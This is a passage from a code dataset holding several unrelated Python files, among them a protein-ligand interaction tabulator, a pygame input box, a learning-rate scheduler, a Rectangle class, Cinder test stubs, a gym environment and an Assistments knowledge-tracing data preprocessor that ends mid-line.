interactions.all_itypes:\n\t\t\t\tinteraction_type=str(type(interaction)).split('.')[-1].replace(\"'>\",\"\")\n\t\t\t\ttable.loc[index,'Frame']=ts.frame\n\t\t\t\ttable.loc[index,'Time']=ts.time\n\t\t\t\ttable.loc[index,'Residue']=interaction.restype+str(interaction.resnr)\n\t\t\t\ttable.loc[index,'Chain']=interaction.reschain\n\t\t\t\ttable.loc[index,'Ligand']=interaction.restype_l+str(interaction.resnr_l)\n\t\t\t\t\n\t\t\t\tif interaction_type == 'hbond':\n\t\t\t\t\ttable.loc[index,'Type']='H-bond'\n\t\t\t\t\ttable.loc[index,'Acceptor']=interaction.atype\n\t\t\t\t\ttable.loc[index,'AcceptorIdx']=interaction.a.idx\n\t\t\t\t\ttable.loc[index,'Donor']=interaction.dtype\n\t\t\t\t\ttable.loc[index,'DonorIdx']=interaction.d.idx\n\t\t\t\t\ttable.loc[index,'DistanceAD']=interaction.distance_ad\n\t\t\t\t\ttable.loc[index,'DistanceAH']=interaction.distance_ah\n\t\t\t\t\ttable.loc[index,'Angle']=interaction.angle\n\t\t\t\t\ttable.loc[index,'Force']=interaction.type\n\t\t\t\t\ttable.loc[index,'ProtIsDon']=interaction.protisdon\n\t\t\t\t\n\t\t\t\telif interaction_type == 'pication':\n\t\t\t\t\ttable.loc[index,'Type']='Pi-cation'\n\t\t\t\t\ttable.loc[index,'Charge']=interaction.charge.type\n\t\t\t\t\ttable.loc[index,'ChargedAtoms']=\",\".join([i.type for i in interaction.charge.atoms])\n\t\t\t\t\ttable.loc[index,'Force']=interaction.type\n\t\t\t\t\ttable.loc[index,'RingType']=interaction.ring.type\n\t\t\t\t\ttable.loc[index,'RingAtoms']=\",\".join([i.type for i in interaction.ring.atoms])\n\t\t\t\t\ttable.loc[index,'RingAtomsIdx']=\",\".join([str(i.idx) for i in interaction.ring.atoms])\n\n\t\t\t\telif interaction_type == 'pistack':\n\t\t\t\t\ttable.loc[index,'Type']='Pi-stacking'\n\t\t\t\t\ttable.loc[index,'StackingType']=interaction.type\n\t\t\t\t\ttable.loc[index,'RecRingType']=interaction.proteinring.type\n\t\t\t\t\ttable.loc[index,'LigRingType']=interaction.ligandring.type\n\t\t\t\t\ttable.loc[index,'RecRingAtoms']=\",\".join([i.type for i in interaction.proteinring.atoms])\n\t\t\t\t\ttable.loc[index,'RecAtomsIdx']=\",\".join([str(i.idx) for i in interaction.proteinring.atoms])\n\t\t\t\t\ttable.loc[index,'LigRingAtoms']=\",\".join([i.type for i in interaction.ligandring.atoms])\n\t\t\t\t\ttable.loc[index,'LigRingAtomsIdx']=\",\".join([str(i.idx) for i in interaction.ligandring.atoms])\n\t\t\t\t\ttable.loc[index,'Distance']=interaction.distance\n\t\t\t\t\ttable.loc[index,'Angle']=interaction.angle\n\t\t\t\t\ttable.loc[index,'Offset']=interaction.offset \n\t\t\t\t\n\t\t\t\telif interaction_type=='saltbridge':\n\t\t\t\t\ttable.loc[index,'Type']='Salt-bridge'\n\t\t\t\t\ttable.loc[index,'NegAtoms']=\",\".join([i.type for i in interaction.negative.atoms])\n\t\t\t\t\ttable.loc[index,'NegAtomsIdx']=\",\".join([str(i.idx) for i in interaction.negative.atoms])\n\t\t\t\t\ttable.loc[index,'PosAtoms']=\",\".join([i.type for i in interaction.positive.atoms])\n\t\t\t\t\ttable.loc[index,'PosAtomsIdx']=\",\".join([str(i.idx) for i in interaction.positive.atoms])\n\t\t\t\t\ttable.loc[index,'Distance']=interaction.distance\n\t\t\t\t\ttable.loc[index,'ProtIsPos']=interaction.protispos\n\t\t\t\t\t\n\t\t\t\telif interaction_type == 'hydroph_interaction':\n\t\t\t\t\ttable.loc[index,'Type']='Hydrophobic'\n\t\t\t\t\ttable.loc[index,'RecAtom']=interaction.bsatom.type\n\t\t\t\t\ttable.loc[index,'RecAtomIdx']=interaction.bsatom.idx\n\t\t\t\t\ttable.loc[index,'LigAtom']=interaction.ligatom.type\n\t\t\t\t\ttable.loc[index,'LigAtomIdx']=interaction.ligatom.idx\n\t\t\t\t\ttable.loc[index,'Distance']=interaction.distance\n\t\t\t\t\t\n\t\t\t\telif interaction_type == 'waterbridge':\n\t\t\t\t\ttable.loc[index,'Type']='Water-bridge'\n\t\t\t\t\ttable.loc[index,'AccType']=interaction.atype\n\t\t\t\t\ttable.loc[index,'DonType']=interaction.dtype\n\t\t\t\t\ttable.loc[index,'WaterIdx']=interaction.water_orig_idx\n\t\t\t\t\ttable.loc[index,'DistanceAWat']=interaction.distance_aw\n\t\t\t\t\ttable.loc[index,'DistanceDWat']=interaction.distance_dw\n\t\t\t\t\ttable.loc[index,'AngleDon']=interaction.d_angle\n\t\t\t\t\ttable.loc[index,'AngleWat']=interaction.w_angle\n\t\t\t\t\ttable.loc[index,'ProtIsDon']=interaction.protisdon\n\n\t\t\t\telif interaction_type == 'halogenbond':\n\t\t\t\t\ttable.loc[index,'Type']='X-bond'\n\t\t\t\t\ttable.loc[index,'Acceptor']=interaction.acctype\n\t\t\t\t\ttable.loc[index,'Donor']=interaction.acctype\n\t\t\t\t\ttable.loc[index,'Distance']=interaction.distance\n\t\t\t\t\ttable.loc[index,'DonAngle']=interaction.don_angle\n\t\t\t\t\ttable.loc[index,'AccAngle']=interaction.acc_angle\n\t \n\t\t\t\telif interaction_type=='metal_complex':\n\t\t\t\t\ttable.loc[index,'Type']='Metal-complex'\n\t\t\t\t\ttable.loc[index,'MetalType']=interaction.metal.type\n\t\t\t\t\ttable.loc[index,'Idx']=interaction.metal.idx\n\t\t\t\t\ttable.loc[index,'TargetType']=interaction.target_type\n\t\t\t\t\ttable.loc[index,'FunctGroup']=interaction.target.fgroup\n\t\t\t\t\ttable.loc[index,'Geometry']=interaction.geometry\n\t\t\t\t\ttable.loc[index,'Distance']=interaction.distance\n\t\t\t\t\ttable.loc[index,'Location']=interaction.location\n\t\t\t\t\n\t\t\t\tindex=index+1 \n\t\tbar.update(i+1)\n\t\tos.remove(name)\n\t\t\n\tprint ('\\n\\n----- ----- ----- SAVING THE RESULTS, PLEASE WAIT ----- ----- -----\\n\\n')\t\n\ttable.set_index(['Frame','Time'], inplace=True)\n\ttable.sort_index(inplace=True)\n\ttable.to_excel('Interactions_Table.xlsx')\n\tprint ('\\n\\n***** ***** ***** ALL DONE, DATA SAVED ON: Interactions_Table.xlsx ***** ***** *****\\n\\n')\t \nif __name__ == \"__main__\":\n\tplipmd(sys.argv[1],sys.argv[2])\n","sub_path":"Scripts/plipMD_V3.1.py","file_name":"plipMD_V3.1.py","file_ext":"py","file_size_in_byte":8359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231737843","text":"import pygame\nACTIVE_BG = (255, 255, 255)\nINACTIVE_BG = (20, 20, 20)\nFONT = pygame.font.SysFont(\"leelawadee\", 20)\n\nclass InputBox:\n \n def __init__(self, screen, x, y, w, h, text=''):\n self.screen = screen\n self.rect = pygame.Rect(x, y, w, h)\n self.color = INACTIVE_BG\n self.text = text\n self.txt_surface = FONT.render(text, True, self.color)\n self.active = False\n\n def handle_event(self, event):\n if event.type == pygame.MOUSEBUTTONDOWN:\n # event pos is when the mouse was when the even happened\n if self.rect.collidepoint(event.pos):\n self.active = True\n else:\n self.active = False\n \n self.color = ACTIVE_BG if self.active else INACTIVE_BG\n\n if event.type == pygame.KEYDOWN:\n if self.active:\n if event.key == pygame.K_BACKSPACE:\n self.text = self.text[:-1]\n else:\n self.text += str(event.unicode)\n \n # Re-render the text.=\n self.txt_surface = FONT.render(self.text, True, self.color)\n\n def getText(self):\n return self.text\n\n def setText(self, text):\n self.text = text\n self.txt_surface = FONT.render(self.text, True, self.color)\n \n def draw(self):\n # draw text\n self.screen.blit(self.txt_surface, (self.rect.x+5, self.rect.y+5))\n # draw rectangle\n pygame.draw.rect(self.screen, self.color, self.rect, 2)","sub_path":"blank copy/src/buttons/input_box.py","file_name":"input_box.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"367855099","text":"\"\"\" Customized learning rate scheduler that are not implemented in pytorch \"\"\"\n\nimport torch\nfrom torch.optim.lr_scheduler import _LRScheduler\n\nclass PolyLR(_LRScheduler):\n \"\"\" Adjust learning rate by \"poly\" policy, refering to paper\n https://arxiv.org/abs/1506.04579\n and serch for \"poly\" in the full-text\n \"\"\"\n def __init__(self, optimizer,\n init_lr= 1e-5, # The initial learning rate\n max_iter= 100, # The maximum number of calling step of this instance\n power= 0.9,\n ):\n self.init_lr = init_lr\n self.max_iter = max_iter\n self.power = power\n self.step_count = -1 # considering super class will call step() once\n super().__init__(optimizer)\n\n def step(self):\n self.step_count += 1\n assert self.step_count <= self.max_iter, \"Call step() should not be more than {} times\".format(self.max_iter)\n\n lr = self.init_lr * (1 - self.step_count / self.max_iter)**self.power\n\n for param_group in self.optimizer.param_groups:\n param_group['lr'] = lr\n\n return lr\n","sub_path":"vos/algo/lr_scheduler.py","file_name":"lr_scheduler.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"256129755","text":"#!/usr/bin/python3\n\"\"\" The rectangle module\"\"\"\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\" A Rectangle class inherited from Base class\n \"\"\"\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" class constructor\n Args:\n width: width of the rectangle\n height: height of the rectangle\n x(int): int value\n y(int): int value\n id: Base class' id attribute\n\n \"\"\"\n super().__init__(id)\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n\n @property\n def width(self):\n \"\"\" width getter method\"\"\"\n return self.__width\n\n @width.setter\n def width(self, width):\n if type(width) is not int:\n raise TypeError(\"{} must be an integer\".format(\"width\"))\n if width <= 0:\n raise ValueError(\"{} must be > 0\".format(\"width\"))\n self.__width = width\n\n @property\n def height(self):\n \"\"\" height getter method\"\"\"\n return self.__height\n\n @height.setter\n def height(self, height):\n if type(height) is not int:\n raise TypeError(\"{} must be an integer\".format(\"height\"))\n if height <= 0:\n raise ValueError(\"{} must be > 0\".format(\"height\"))\n self.__height = height\n\n @property\n def x(self):\n \"\"\" x getter method\"\"\"\n return self.__x\n\n @x.setter\n def x(self, x):\n if type(x) is not int:\n raise TypeError(\"{} must be an integer\".format(\"x\"))\n if x < 0:\n raise ValueError(\"{} must be >= 0\".format(\"x\"))\n self.__x = x\n\n @property\n def y(self):\n \"\"\"y getter method\"\"\"\n return self.__y\n\n @y.setter\n def y(self, y):\n if type(y) is not int:\n raise TypeError(\"{} must be an integer\".format(\"y\"))\n if y < 0:\n raise ValueError(\"{} must be >= 0\".format(\"y\"))\n self.__y = y\n\n def area(self):\n \"\"\" returns the area value of the Rectangle instance\"\"\"\n return self.__width * self.__height\n\n def display(self):\n \"\"\"prints in stdout the Rectangle instance with the character #\"\"\"\n for i in range(0, self.__y):\n print()\n for row in range(0, self.__height):\n for j in range(0, self.__x):\n print(\" \", end=\"\")\n for h in range(0, self.__width):\n print('#', end=\"\")\n print()\n\n def __str__(self):\n \"\"\"returns a string\"\"\"\n return (\"[Rectangle] ({}) {}/{} - {}/{}\".format(self.id,\n self.__x, self.__y, self.__width, self.__height))\n\n def update(self, *args, **kwargs):\n \"\"\"assigns an argument to each attribute\"\"\"\n if args:\n attributes = [\"id\", \"width\", \"height\", \"x\", \"y\"]\n for i, j in enumerate(args):\n if i < len(attributes):\n setattr(self, attributes[i], j)\n else:\n for key, value in kwargs.items():\n if hasattr(self, key):\n setattr(self, key, value)\n\n def to_dictionary(self):\n \"\"\"Returns the dictionary representation of a Rectangle\"\"\"\n return {'x': self.x, 'y': self.y, 'id': self.id, 'height':\n self.height, 'width': self.width}\n","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"266000353","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\ndef stub_copy_volume_to_image(self, context, volume, metadata, force):\n image_metadata = {\n \"status\": \"uploading\",\n \"container_format\": \"bare\",\n \"image_name\": \"test\",\n \"visibility\": \"private\",\n \"updated_at\": \"2017-06-05T08:44:28.000000\",\n \"image_id\": \"de75b74e-7f0d-4b59-a263-bd87bfc313bd\",\n \"display_description\": None,\n \"id\": \"3a81fdac-e8ae-4e61-b6a2-2e14ff316f19\",\n \"size\": 1,\n \"disk_format\": \"raw\",\n \"volume_type\": None,\n \"protected\": False\n }\n return image_metadata\n\n\ndef stub_manage_existing(self, req, body):\n volume = {\n \"host\": \"null\",\n \"cluster\": \"cluster@backend\",\n \"ref\": {\n \"source-name\": \"existingLV\",\n \"source-id\": \"1234\"\n },\n \"name\": \"New Volume\",\n \"availability_zone\": \"az2\",\n \"description\": \"Volume imported from existingLV\",\n \"volume_type\": \"null\",\n \"bootable\": True,\n \"metadata\": {\n \"key1\": \"value1\",\n \"key2\": \"value2\"\n }\n }\n\n return volume\n","sub_path":"cinder-14.0.0/cinder/tests/functional/api_sample_tests/fakes.py","file_name":"fakes.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"347039429","text":"#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\n\n\nclass Solution(object):\n def maximalSquare(self, matrix):\n lenN = len(matrix)\n if not lenN:\n return 0\n lenM = len(matrix[0])\n #dp = [[0 for i in range(lenM)] for j in range(lenN)]\n matrix = [[int(i) for i in j] for j in matrix]\n result = 0\n for i in range(0, lenN):\n if matrix[i][0]:\n result = 1\n break\n for i in range(0, lenM):\n if matrix[0][i]:\n result = 1\n break\n for i in range(1, lenN):\n for j in range(1, lenM):\n if matrix[i][j]:\n matrix[i][j] = min(matrix[i-1][j-1], matrix[i-1][j], matrix[i][j-1]) + 1\n result = max(result, matrix[i][j])\n\n return result * result\n\n\ns = Solution()\nprint(s.maximalSquare([[]]))\nprint(s.maximalSquare([[\"1\",\"0\",\"1\",\"0\",\"0\"],[\"1\",\"0\",\"1\",\"1\",\"1\"],[\"1\",\"1\",\"1\",\"1\",\"1\"],[\"1\",\"0\",\"0\",\"1\",\"0\"]]))\n","sub_path":"221.py","file_name":"221.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"336335453","text":"import gym\nfrom gym import spaces\nfrom util.constants import *\nfrom util.functions import *\nfrom pygame import *\nfrom pygame.locals import *\nimport numpy as np\n\ndef next_observation(disp, width, height):\n\tnext_state = (surfarray.pixels2d(disp.subsurface((0,0,width,height)).copy())) \n\tnext_state[next_state == 16777215] = 0\n\tnext_state[next_state == 65280] = 1\n\treturn next_state\n\nclass BlockAvoid(gym.Env):\n\tmetadata = {'render.modes': ['human']}\n\n\tdef __init__(self):\n\t\tsuper(BlockAvoid, self).__init__()\n\t\tself.disp = display.set_mode((screen_width, screen_height), 0, 32)\n\t\tself.N_DISCRETE_ACTIONS = 3\n\t\tself.WIDTH = int(screen_width/agent_vision)\n\t\tself.HEIGHT = int(screen_height - ground_height)\n\t\tself.action_space = spaces.Discrete(self.N_DISCRETE_ACTIONS)\n\t\tself.observation_space = spaces.Box(low=0, high=1, shape=(self.WIDTH, self.HEIGHT), dtype=np.uint8)\n\n\tdef step(self, action):\n\t\tglobal character_position\n\t\tif action == 1:\n\t\t\tcharacter_position[1] -= character_jump_power\n\t\telif action == 2:\n\t\t\tcharacter_position[1] += character_jump_power\n\n\t\tif character_position[1]<0:\n\t\t\tcharacter_position[1] = 0\n\t\telif character_position[1] > screen_height-character_dimensions[1]-ground_height:\n\t\t\tcharacter_position[1] = screen_height-character_dimensions[1]-ground_height\n\t\tgenerate_terrain()\n\t\treward = calculate_reward()\n\t\tnext_state = next_observation(self.disp, self.WIDTH, self.HEIGHT)\n\t\tdraw_everything(self.disp, character_position)\n\t\tdone = collision_checker()\n\t\treturn next_state, reward, done, {}\t\t\n \t \n\tdef reset(self):\n\t\tglobal character_position\n\t\tcharacter_position = reset_env()\n\t\treturn next_observation(self.disp, self.WIDTH, self.HEIGHT)","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"222800124","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# Generated file, DO NOT EDIT\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass WidgetSize(Model):\n \"\"\"WidgetSize.\n\n :param column_span: The Width of the widget, expressed in dashboard grid columns.\n :type column_span: int\n :param row_span: The height of the widget, expressed in dashboard grid rows.\n :type row_span: int\n \"\"\"\n\n _attribute_map = {\n 'column_span': {'key': 'columnSpan', 'type': 'int'},\n 'row_span': {'key': 'rowSpan', 'type': 'int'}\n }\n\n def __init__(self, column_span=None, row_span=None):\n super(WidgetSize, self).__init__()\n self.column_span = column_span\n self.row_span = row_span\n","sub_path":"vsts/vsts/dashboard/v4_1/models/widget_size.py","file_name":"widget_size.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"493666646","text":"\n# coding: utf-8\n\n# In[1]:\n\n\n# imports\nimport numpy as np\nimport pandas as pd\nimport _pickle as cPickle\nimport random\nfrom datetime import datetime\nfrom time import time\nimport csv\nfrom AssistmentsProperties import AssistmentsProperties\n\n\n# In[6]:\n\n\n# Assistments class for data preprocessing\nclass DataPreprocessor(object):\n def __init__(self, dataset_str, version):\n self.dataset = dataset_str\n self.version = version\n \n if ('Assistments' == dataset_str):\n self.attr = AssistmentsProperties(version)\n else:\n print('{} dataset not yet realized'.format(dataset_str))\n exit(1)\n \n # default data config\n self.config = {\n 'method': 'default',\n 'has_scaffolding': True,\n 'count_no_skill_id': True,\n 'has_test_mode': True,\n 'allow_multi_skills': True,\n 'window_length': 10,\n 'one_hot': True\n }\n \n def get_datapath(self, ext='csv', is_original=True, is_problem_contents=False, is_training=True):\n return self.attr.get_datapath(ext, is_original, self.config, is_problem_contents, is_training)\n \n def set_datapath(self, datapath):\n self.attr.set_datapath(datapath)\n \n # input: dataframe, split attribute, and split_rate\n # input should be injected after assigning idx\n # return a list\n # list[0] = (test_df, test_num_problems, test_num_steps)\n # list[1] = (train_df, train_num_problems, train_num_steps)\n # list[2] = max_num_skills\n def split_train_test(self, df, split_attr, sortby_attr, split_rate=0.1):\n if ('Assistments' == self.dataset):\n max_num_skills = __class__.get_nunique(df, self.attr.skill_id)\n \n __class__.sort(df, [split_attr, sortby_attr], [True, True])\n # split dataframes according to split_attr\n # note that groupby preserves the order of samples within groups (see documentation)\n groupby_obj = df.groupby(split_attr, sort=False)\n print('groupby done')\n \n # process before shuffling\n if ('default' == self.config['method']):\n pass\n elif ('sliding_window' == self.config['method']):\n window_length = self.config['window_length']\n groupby_obj = groupby_obj.apply(lambda x: None \n if len(x) < 10 \n else __class__.rolling_window(x.as_matrix(), window_length)).dropna()\n \n print('processed before shuffling')\n \n # shuffle\n group_list = list(groupby_obj)\n random.shuffle(group_list)\n print('shuffled')\n \n # number of elements for test df\n num_groups = int(len(group_list) * split_rate) + 1\n print('num_groups: ', num_groups)\n \n test_groups = group_list[:num_groups]\n train_groups = group_list[num_groups:]\n \n columns = df.columns.values\n \n test_dfs = self.groups_to_dflist(test_groups, columns)\n train_dfs = self.groups_to_dflist(train_groups, columns)\n print('dfs for testing and training created')\n\n if ('default' == self.config['method']):\n test_num_steps = np.max([len(rows) for rows in test_dfs])\n train_num_steps = np.max([len(rows) for rows in train_dfs])\n elif ('sliding_window' == self.config['method']):\n test_num_steps = train_num_steps = self.config['window_length']\n\n return [(test_dfs, test_num_steps),\n (train_dfs, train_num_steps),\n max_num_skills]\n else:\n print('{} dataset not yet realized'.format(self.dataset))\n exit(1)\n \n def groups_to_dflist(self, group_list, columns):\n if ('default' == self.config['method']):\n dfs = []\n for _, rows in group_list:\n dfs.append(rows)\n \n elif ('sliding_window' == self.config['method']):\n window_length = self.config['window_length']\n dfs = [pd.DataFrame(np.concatenate(group, axis=0), columns=columns) \n for group in group_list]\n dfs = [df.iloc[window_length * i:window_length * (i + 1), :] \n for df in dfs for i in range(len(df) // window_length)]\n \n else:\n print('{} method is not yet realized'.format(method))\n exit(1)\n \n return dfs\n \n # setup for preparing rnn\n def set_config(self, config):\n self.config.update(config)\n \n def get_attributes_for_df(self):\n attr_dict = {}\n if ('Assistments' == self.dataset):\n if ('2009' == self.version):\n attr_dict['split'] = self.attr.user_id\n attr_dict['time'] = self.attr.order_id\n attr_dict['correct'] = self.attr.correct\n attr_dict['skill_id'] = self.attr.skill_id\n\n # for data config\n attr_dict['scaffolding'] = self.attr.original\n attr_dict['tutor_mode'] = self.attr.tutor_mode\n attr_dict['allow_multi_skills'] = self.attr.order_id\n\n elif('2012' == self.version):\n attr_dict['split'] = self.attr.user_id\n attr_dict['time'] = self.attr.end_time\n attr_dict['correct'] = self.attr.correct\n attr_dict['skill_id'] = self.attr.skill_id\n \n # for data config\n attr_dict['scaffolding'] = self.attr.original\n attr_dict['tutor_mode'] = self.attr.tutor_mode\n \n # problem contents\n attr_dict['problem_content'] = self.attr.problem_content\n \n # TODO: how to represent multiple skills in 2012 dataset\n \n else:\n print('{} version not yet realized'.format(self.version))\n exit(1)\n else:\n print('{} dataset not yet realized'.format(self.dataset))\n \n return attr_dict\n \n # input\n # method: {default, moving_window}\n # max_num_steps: maximum number of steps\n # max_num_skills: maximum number of skills\n # students: list of tuples of 3 elements\n # students[i][0]: a list of length 1 with num_problems\n # students[i][1]: a list of skills\n # students[i][2]: a list of correctness\n # len(students[i][1]) == len(students[i][2]) == students[i][0][0]\n def prepare_rnn(self):\n # set proper attributes for df depending on dataset and version\n attr_dict = self.get_attributes_for_df()\n \n split_attr = attr_dict.get('split', None)\n time_attr = attr_dict.get('time', None)\n correct_attr = attr_dict.get('correct', None)\n skill_id_attr = attr_dict.get('skill_id', None)\n scaffolding_attr = attr_dict.get('scaffolding', None)\n tutor_mode_attr = attr_dict.get('tutor_mode', None)\n allow_multi_skill_attr = attr_dict.get('allow_multi_skills', None)\n \n if ('Assistments' == self.dataset):\n if ('2012' == self.version):\n problem_content_attr = attr_dict.get('problem_content', None)\n \n method = self.config['method']\n has_scaffolding = self.config['has_scaffolding']\n count_no_skill_id = self.config['count_no_skill_id']\n has_test_mode = self.config['has_test_mode']\n allow_multi_skills = self.config['allow_multi_skills']\n one_hot = self.config['one_hot']\n df = self.df.copy(deep=True)\n \n if (not has_scaffolding):\n if (None == scaffolding_attr):\n print('{} dataset {} version needs scaffolding_attr'.format(self.dataset, self.version))\n exit(1)\n df = df.loc[df.loc[:, scaffolding_attr].astype('int') == 1]\n if (not has_test_mode):\n if (None == tutor_mode_attr):\n print('{} dataset {} version needs tutor_mode_attr'.format(self.dataset, self.version))\n exit(1)\n df = df.loc[df.loc[:, tutor_mode_attr].astype('str') == 'tutor']\n if (not allow_multi_skills):\n if (None == allow_multi_skill_attr):\n print('{} dataset {} version needs allow_multi_skill_atr'.format(self.dataset, self.version))\n exit(1)\n else:\n if (one_hot):\n df.drop_duplicates(subset=[allow_multi_skill_attr], inplace=True)\n # if not one_hot? => make every correct data to tuples or list of correctness\n \n if (None == skill_id_attr):\n print('{} dataset {} version needs skill_id_attr'.format(self.dataset, self.version))\n exit(1)\n \n if (not count_no_skill_id):\n df = df.dropna(axis=0, subset=[skill_id_attr], how='any')\n else:\n df.loc[:, skill_id_attr].fillna(np.max(df.loc[:, skill_id_attr])+1, axis=0, inplace=True)\n \n if ('2009' == self.version):\n df = df.loc[:, [split_attr, skill_id_attr, correct_attr, time_attr]]\n elif ('2012' == self.version):\n df = df.loc[:, [split_attr, skill_id_attr, correct_attr, time_attr, problem_content_attr]]\n df.loc[:, problem_content_attr].fillna('', axis=0, inplace=True)\n \n # TODO\n if (not one_hot and '2009' == self.version):\n # make tuples for correct\n #df.loc[:, correct_attr] = df.loc[:, correct_attr].astype('str')\n pass\n \n # use original correct values from 0 ~ 1\n # if ('2012' == self.version):\n # __class__.process_correct_attr(df=df, correct_attr=correct_attr)\n # else:\n # __class__.assign_idx_to_column_values(df, correct_attr)\n\n __class__.assign_idx_to_column_values(df, split_attr)\n __class__.assign_idx_to_column_values(df, skill_id_attr)\n\n train_test_num_skill_list = self.split_train_test(df, split_attr=split_attr,\n sortby_attr=time_attr, split_rate=0.1)\n \n test_dfs = train_test_num_skill_list[0][0]\n test_num_steps = train_test_num_skill_list[0][1]\n\n train_dfs = train_test_num_skill_list[1][0]\n train_num_steps = train_test_num_skill_list[1][1]\n\n num_skills = train_test_num_skill_list[2]\n \n print('convert dfs to rnn inputs')\n # convert list of dataframes to rnn input\n if ('2012' == self.version):\n test_students = [([len(rows)], \n rows[skill_id_attr].values.tolist(),\n rows[correct_attr].values.tolist(), \n rows[problem_content_attr].values.tolist()) \n for rows in test_dfs]\n\n train_students = [([len(rows)], \n rows[skill_id_attr].values.tolist(), \n rows[correct_attr].values.tolist(), \n rows[problem_content_attr].values.tolist()) \n for rows in train_dfs]\n \n elif ('2009' == self.version or '2015' == self.version):\n test_students = [([len(rows)], \n rows[skill_id_attr].values.tolist(), \n rows[correct_attr].values.tolist()) \n for rows in test_dfs]\n\n train_students = [([len(rows)], \n rows[skill_id_attr].values.tolist(), \n rows[correct_attr].values.tolist()) \n for rows in train_dfs]\n\n self.test_rnn_data = (test_students, test_num_steps, num_skills)\n self.train_rnn_data = (train_students, train_num_steps, num_skills)\n print('conversion done')\n\n else:\n print('{} dataset not yet realized'.format(self.dataset))\n \n def get_save_path(self, ext='csv', is_problem_contents=False):\n process_config = self.config\n \n test_save_path = self.get_datapath(ext=ext, \n is_original=False, \n is_problem_contents=is_problem_contents,\n is_training=False)\n train_save_path = self.get_datapath(ext=ext,\n is_original=False, \n is_problem_contents=is_problem_contents,\n is_training=True)\n\n return test_save_path, train_save_path\n \n # ext: extension - csv, etc.\n def save(self, ext='csv', is_problem_contents=False):\n _ext = {\n 'csv': 'csv',\n 'pkl': 'pkl'\n }.get(ext, None)\n \n if (None == ext):\n print('{} extension not yet realized'.format(ext))\n exit(1)\n \n test_save_path, train_save_path = self.get_save_path(ext, is_problem_contents=is_problem_contents)\n test_rnn_data = self.test_rnn_data\n train_rnn_data = self.train_rnn_data\n if ('csv' == ext):\n __class__.save_rnn_data_as_csv(test_rnn_data, test_save_path)\n __class__.save_rnn_data_as_csv(train_rnn_data, train_save_path)\n \n elif ('pkl' == ext):\n __class__.save_rnn_data_as_pkl(test_rnn_data, test_save_path)\n __class__.save_rnn_data_as_pkl(train_rnn_data, train_save_path)\n \n # for 2009 version ...\n # self.config should include\n # 1. method: default or moving_windows\n # 2. has_scaffolding: True/False; include scaffolding problems or not; indicated by 'original' column\n # 3. count_no_skill_id: True/False; include interactions with no skill id or not\n # 4. has_test_mode: True/False; include test mode or not\n # 5. allow_multi_skills: True/False; whehter to allow multi skill or not\n # 6. window_length: if method is sliding_window, window_length should be provided. if not, default to 10\n def generate_rnn_data(self, save=False, ext='csv', is_problem_contents=False, encoding='iso-8859-1'):\n if ('Assistments' == self.dataset):\n assert self.config != None, 'please set config first'\n assert self.config['method'] != None, 'method is none'\n assert type(self.config['has_scaffolding']) == bool, 'has_scaffolding is not boolean'\n assert type(self.config['count_no_skill_id']) == bool, 'count_no_skill_id is not boolean'\n assert type(self.config['has_test_mode']) == bool, 'has_test_mode is not boolean'\n assert type(self.config['allow_multi_skills']) == bool, 'allow_multi_skills is not boolean'\n \n if ('df' not in self.__dict__):\n self.df = __class__.read_data_from_csv(self.get_datapath(ext='csv', \n is_original=True, \n is_problem_contents=False, \n is_training=True), \n encoding)\n if ('2012' == self.version):\n problem_contents = __class__.read_data_from_csv(self.get_datapath(ext='csv', \n is_original=True, \n is_problem_contents=True, \n is_training=True),\n encoding)\n self.df = self.df.join(problem_contents.set_index(self.attr.problem_id), \n on=self.attr.problem_id, how = 'outer')\n \n self.prepare_rnn()\n \n if (type(ext) == list and save):\n for e in ext:\n self.save(e)\n \n elif (save):\n self.save(ext)\n\n return (self.test_rnn_data, self.train_rnn_data)\n else:\n print('{} dataset not yet realized'.format(self.dataset))\n \n def load_rnn_data(self, is_training, ext='pkl', is_problem_contents=False):\n _ext = {\n 'pkl': 'pkl'\n }.get(ext, None)\n \n if (None == _ext):\n print('{} extension is not yet realized'.format(ext))\n exit(1)\n \n datapath = self.get_datapath(ext=ext, \n is_original=False, \n is_problem_contents=is_problem_contents, \n is_training=is_training)\n \n if ('pkl' == ext):\n obj = __class__.load_rnn_data_from_pkl(datapath)\n \n return obj\n # attr_list: list of args for sorting from higher priorities\n \n @staticmethod\n def sort(df, attr_list, is_ascending_list=[True], inplace=True):\n assert type(attr_list) == list, 'attr_list is not a list'\n assert type(is_ascending_list) == list, 'is_ascending_list is not a list'\n assert len(attr_list) == len(is_ascending_list), 'len of attr_list and 